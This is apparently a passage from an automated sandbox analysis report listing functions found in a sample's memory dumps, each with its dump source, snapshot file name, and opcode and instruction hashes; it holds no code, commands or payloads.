                                                            • Instruction Fuzzy Hash: 1521DB31F0DA1D4FEBA4EB98C4A06B87792EF98310F050179E40DC32D6CD686C818B80
                                                            Function 00007FFD9BAC9DD5 Relevance: .1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32a433b8782cd9eeab21a88a4301ab6fa86f7e1aa54c6817aefcc01b4efba77c
                                                            • Instruction ID: ff2818d03a77447f8cfbe639afdb03b872b8eaa5d87c4136a4852224ec1a91f8
                                                            • Opcode Fuzzy Hash: 32a433b8782cd9eeab21a88a4301ab6fa86f7e1aa54c6817aefcc01b4efba77c
                                                            • Instruction Fuzzy Hash: A7218371F19A5D8FEBA4FB5888A56B873E1FF58300F0005B9E41DD32A2CE386D418B40
                                                            Function 00007FFD9BAEBD90 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 45278148b7d8584e484b96f914775607c0dcaa5f08219ed96c06bebedfe62039
                                                            • Instruction ID: 9d5c221b1c9b997c6d61f2419eabe0446248e73e65594c1369ff7b60bfe1731c
                                                            • Opcode Fuzzy Hash: 45278148b7d8584e484b96f914775607c0dcaa5f08219ed96c06bebedfe62039
                                                            • Instruction Fuzzy Hash: C401493A7195510BC31AE72DE8E64E437A0EF9623E74805F3D089CF173E948984EC784
                                                            Function 00007FFD9BAEDA48 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 485666a2feb405f50e856f2396d2767ea852f330de58da5830f5d35cb9c8ef63
                                                            • Instruction ID: 36c6a8ff7d3a3ff1011ed89c6951ccb60e86fbb2827ca2c6a79219260c04949f
                                                            • Opcode Fuzzy Hash: 485666a2feb405f50e856f2396d2767ea852f330de58da5830f5d35cb9c8ef63
                                                            • Instruction Fuzzy Hash: 1A017C32F094198BFBA49A98D8957FC73A2EB88320F060131D408971A5DE79AB828780
                                                            Function 00007FFD9BAEBE35 Relevance: .0, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80f676f4a3e4c3c39e8d8ee9f482d2265ab05cee090e2b4e567133520cbda318
                                                            • Instruction ID: 60f068c5292eb34628fee7fab290e36cd7657457fb2a733baa916941194a1586
                                                            • Opcode Fuzzy Hash: 80f676f4a3e4c3c39e8d8ee9f482d2265ab05cee090e2b4e567133520cbda318
                                                            • Instruction Fuzzy Hash: 3BF0592A71D2950AC72AF33C68F54F83B40CFA623A78900F7D089CF0A3D808884DC395
                                                            Function 00007FFD9BAC5E48 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3812e8bfe800c42e2491dc803dca62e96b8d79c275c60224ee2afcb256c3020e
                                                            • Instruction ID: 79294958e581acc79d26c4ba3035c3cfc24d5bf8aaf91381668476c49ce52f78
                                                            • Opcode Fuzzy Hash: 3812e8bfe800c42e2491dc803dca62e96b8d79c275c60224ee2afcb256c3020e
                                                            • Instruction Fuzzy Hash: AF016D31F095198BEBA0EB40C864BEC6361AF54300F4602B1980ED72E1CE786F819B80
                                                            Function 00007FFD9BAEBDB8 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49ee2024d6bdbabab81d42cc971cd52adabb4baa43b0a29479438398620d741e
                                                            • Instruction ID: b342ecef436e6dc7b24fb595d2ab1f235e893116cdbfb93eb82361dae2abddfe
                                                            • Opcode Fuzzy Hash: 49ee2024d6bdbabab81d42cc971cd52adabb4baa43b0a29479438398620d741e
                                                            • Instruction Fuzzy Hash: BCF0E526B195050BC328E72CE8F68F43790DF9A23AB8940B7E14ACF2B7DC599C4DC640
                                                            Function 00007FFD9BAE32E9 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d87e2c211d9b88cc16bfe3c15ca0507365e69e1e69ffae347d47c33b5afe13b9
                                                            • Instruction ID: a4ba7372a5c67f9999a113d89b2c175542e3f7f8fdf81e1c546932db42b02780
                                                            • Opcode Fuzzy Hash: d87e2c211d9b88cc16bfe3c15ca0507365e69e1e69ffae347d47c33b5afe13b9
                                                            • Instruction Fuzzy Hash: C6E0122070EBC84FC70E963948695507FB1EB6B11178A52DBC445CB2F3D919DC89C756
                                                            Function 00007FFD9BADD029 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bad3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba032aff2c08a0063caa9515ae25b6389257b3e5550dfb80b68741fcd9a7b7b2
                                                            • Instruction ID: 98230f718d9159a59b02295e758b64468b7432c00d0a2f740f9c476f64840594
                                                            • Opcode Fuzzy Hash: ba032aff2c08a0063caa9515ae25b6389257b3e5550dfb80b68741fcd9a7b7b2
                                                            • Instruction Fuzzy Hash: 08F06D6151E3C40FC3129B3888654547FB0EA2720535B45FBC0CACB5B3D91A888B8302
                                                            Function 00007FFD9BAC4792 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9e126082e6e7d33fbdadeee630665ee9f0c59e8dd31bd30ae80c8bef0500291
                                                            • Instruction ID: 69b149e93df007d8d3ee1872b690056a97aa8b4cd9fb1d730ac153971f1e3c92
                                                            • Opcode Fuzzy Hash: c9e126082e6e7d33fbdadeee630665ee9f0c59e8dd31bd30ae80c8bef0500291
                                                            • Instruction Fuzzy Hash: 87F03031B0D41F4BE669FB8494A06B932E1FB54300F15057ED46BD31F6ED69AD128644
                                                            Function 00007FFD9BAC3DB2 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ae18f02404e4c38ce2272414c1a1555b79b1eafc4ef038a61794460bc4ec3d4
                                                            • Instruction ID: c9f4e265927a895ea9610c8a572c3ea675b8a580bb23570c2ff9a0fc54a36bc0
                                                            • Opcode Fuzzy Hash: 6ae18f02404e4c38ce2272414c1a1555b79b1eafc4ef038a61794460bc4ec3d4
                                                            • Instruction Fuzzy Hash: 91F03A30E2951E8BEB58FB84D865ABD72F1FF44314F00063EE41AD72D5DFB86A008A80
                                                            Function 00007FFD9BAD9339 Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bad3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9dcd045e45931941587e6964fbf648d592b396f5ce602f99611b686dd613900a
                                                            • Instruction ID: bdda51dd8d512d6e783626152cfaf922491266d222f76d8b256bc72c510efed7
                                                            • Opcode Fuzzy Hash: 9dcd045e45931941587e6964fbf648d592b396f5ce602f99611b686dd613900a
                                                            • Instruction Fuzzy Hash: 24E01A21A0A7844FC70A96388C699503FB1EA6B21178A01DBD045CB5B3E519CC48C712
                                                            Function 00007FFD9BAC453E Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a910977822b8c92c576265edb5b32a01c18198aee3000b557f60e55b00c8074
                                                            • Instruction ID: 66eb85967c2022c6022e6268294d5dee7ac5e0fe819d27889978c773aece9a69
                                                            • Opcode Fuzzy Hash: 7a910977822b8c92c576265edb5b32a01c18198aee3000b557f60e55b00c8074
                                                            • Instruction Fuzzy Hash: 53E0483170DC0E86F771A75888645BE7252BBD0321F164735C029C31E5DEA8EB054685
                                                            Function 00007FFD9BAC39F0 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                            • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                            • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                            • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                            Function 00007FFD9BAEA7E0 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                            Function 00007FFD9BAEA750 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                            Function 00007FFD9BAEDCF9 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 895117c7c16dc1a95151e6e79a0ca632ef6ace2f3c76778395e0f7e851ec684b
                                                            • Instruction ID: a1ff08f5828d7a3434f51513314aaef9b2c2438690b6babccf18e38a66fb07ee
                                                            • Opcode Fuzzy Hash: 895117c7c16dc1a95151e6e79a0ca632ef6ace2f3c76778395e0f7e851ec684b
                                                            • Instruction Fuzzy Hash: 08E04F2194F3C04FC70B973088788503F609E1721074A41EAC045CF2B3E9298C49C712
                                                            Function 00007FFD9BAD9189 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bad3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 57c05ac2987a1c9a232998af73133ffae786d9f46d46fe1d87677a7ea7878e61
                                                            • Instruction ID: dc5eb35cb6c66be914cb053f00a5cf57367d6811ca7c115631cbba8f1d51af35
                                                            • Opcode Fuzzy Hash: 57c05ac2987a1c9a232998af73133ffae786d9f46d46fe1d87677a7ea7878e61
                                                            • Instruction Fuzzy Hash: 09E01A7154A3C04FCB0AAB7488699447FB0AE6B21078E41DEC04ACB5B3E62D8949C701
                                                            Function 00007FFD9BAE9619 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 26f7b8e5420caf55674fcd1eeefa78ad6b664eade950306489ac6521ace594b1
                                                            • Instruction ID: d183d8b351b9258382041483009275d34f091fbe5fc99ac062e434f71e887885
                                                            • Opcode Fuzzy Hash: 26f7b8e5420caf55674fcd1eeefa78ad6b664eade950306489ac6521ace594b1
                                                            • Instruction Fuzzy Hash: BEE0173191A7884FC70AAB3488A99903FB0EE2B21178B01CBD045CF5B3EA5D8D89C752
                                                            Function 00007FFD9BAE8079 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f7c1c8b6046808b1daa80e4fb86cad5e51b4d4d7a8d731e1cb782672d15a361
                                                            • Instruction ID: 1c41cf1b7527416d22d8385800dde21ae111a85497a1ef29e34a8891a9e0f69b
                                                            • Opcode Fuzzy Hash: 9f7c1c8b6046808b1daa80e4fb86cad5e51b4d4d7a8d731e1cb782672d15a361
                                                            • Instruction Fuzzy Hash: 8EE04F2154F3C04FC70B973088788547F60DE6721038A40EEC045CF6B7E529CD49C702
                                                            Function 00007FFD9BAEDC79 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0942819c43bb116747a83364e814a44ed5356398418638f3923ca3b254ac960b
                                                            • Instruction ID: 9530dbe6f02b05efc05873b2eb13143494972cc119a4d9ef245e3c159f2f7d2d
                                                            • Opcode Fuzzy Hash: 0942819c43bb116747a83364e814a44ed5356398418638f3923ca3b254ac960b
                                                            • Instruction Fuzzy Hash: 4FE04F2194E3C44FC70B973088788503F609E2721078A41EEC045CF2B3E6298849C702
                                                            Function 00007FFD9BAE20F0 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                            Function 00007FFD9BAEBDE0 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f89cb3f62b3182ca9adc3d9aed498fb5175fa03025083ebc1b10905a140eb21
                                                            • Instruction ID: 6bcad832d804687a7e165d84ccea6df78e1e707217a051a1d94f39070bb8a8b8
                                                            • Opcode Fuzzy Hash: 9f89cb3f62b3182ca9adc3d9aed498fb5175fa03025083ebc1b10905a140eb21
                                                            • Instruction Fuzzy Hash: 6AD01234B519044FC71CA73888598747391EBAA216B9550A9D00AC72B1D9AADD89C741
                                                            Function 00007FFD9BAE75B8 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                            • Instruction ID: a4561d665d89cd8225780beb4f044a30b88973759cbd08a7a8b71f63e77c0c36
                                                            • Opcode Fuzzy Hash: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                            • Instruction Fuzzy Hash: 9DD01234B519044FC71CA7389859C747391EBAA216B9540A9D00AC72B1D96AED89C741
                                                            Function 00007FFD9BAC7D6E Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70364ec1e3a5c3c36bad224595f60b3a7e67816146122890fadff4bbdbdd6d63
                                                            • Instruction ID: a2aee5df89c103e365712deedb081fca775404d00e4d05e7f319b321a242c388
                                                            • Opcode Fuzzy Hash: 70364ec1e3a5c3c36bad224595f60b3a7e67816146122890fadff4bbdbdd6d63
                                                            • Instruction Fuzzy Hash: 9ED0C930E09618CEEBA0DB64C851B6877B2FF48310F5002F6D01DE32CACB356D819B40
                                                            Function 00007FFD9BAC2C40 Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1249c1b0514c7178be080b616e912f9abb5f72fd4ef16b669b0acf00b4ae93e6
                                                            • Instruction ID: 668154ff0a7214bb04d25809eeb8acf633cfa9dac408f7800204cefbd749011e
                                                            • Opcode Fuzzy Hash: 1249c1b0514c7178be080b616e912f9abb5f72fd4ef16b669b0acf00b4ae93e6
                                                            • Instruction Fuzzy Hash: DAA00204DA781E01D81832FB1D9789474505FA9154FC61A60E81980196FCCE17F907A3
                                                            Function 00007FFD9BAED5A0 Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7d2018242a0126bf40494a73c7f59b4a5ac1d0e95081e02a01ac1a34b36981f
                                                            • Instruction ID: d9fb39e60b51fa348b705f2061fbf3ce4f55973df5d7edfc5407c4deb03342b9
                                                            • Opcode Fuzzy Hash: c7d2018242a0126bf40494a73c7f59b4a5ac1d0e95081e02a01ac1a34b36981f
                                                            • Instruction Fuzzy Hash: 5EA00244D6782F01E91C32FB0EDB5B534915A88295FC901A1FD48C81D7E88D53EE12F3

                                                            Executed Functions

                                                            Function 00007FFD9BAA1FE8 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000002B.00000002.2214617129.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_43_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7666d2b8042b5748835df10e626df8f803f46709ecf54e51102bfe9d3dd031ec
                                                            • Instruction ID: 64c0efb8ededd9b7375937b6ffdca0a2f26b62b885ddb8f4c57290109e2e9230
                                                            • Opcode Fuzzy Hash: 7666d2b8042b5748835df10e626df8f803f46709ecf54e51102bfe9d3dd031ec
                                                            • Instruction Fuzzy Hash: 7311A721F1EA1E5BE7B4AB9884646F97293FF48710F1241B5D40EE31F2DEAC6E508690
                                                            Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000002B.00000002.2214617129.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_43_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82a9f36e522e754ee400106d3f751e20abb237ded239e73501214674f7ada03f
                                                            • Instruction ID: 02e6b586664894bfd40054fb4812d7ea2db9dcc27b75b9830fb5ea75b05f2daf
                                                            • Opcode Fuzzy Hash: 82a9f36e522e754ee400106d3f751e20abb237ded239e73501214674f7ada03f
                                                            • Instruction Fuzzy Hash: 7E11A335B0E68D8EE721DFA8886119C7BB1EF42711F0645B7C088DB1A2D574164987A4
                                                            Function 00007FFD9BAA0C40 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000002B.00000002.2214617129.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_43_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d023ec2868f824baed77f8c41d73f85fca4a41eb64c5f3e21906c5ec20e96930
                                                            • Instruction ID: 9bf38bdb979dfdbe8453b08beff877560a5af44b111f6b5aaba68bb9f18d51f6
                                                            • Opcode Fuzzy Hash: d023ec2868f824baed77f8c41d73f85fca4a41eb64c5f3e21906c5ec20e96930
                                                            • Instruction Fuzzy Hash: 9B01A135B0E68D8FE722DFA8886419CBFB1EF42711F0645F7C088DB1A2D97466498764
                                                            Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000002B.00000002.2214617129.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_43_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
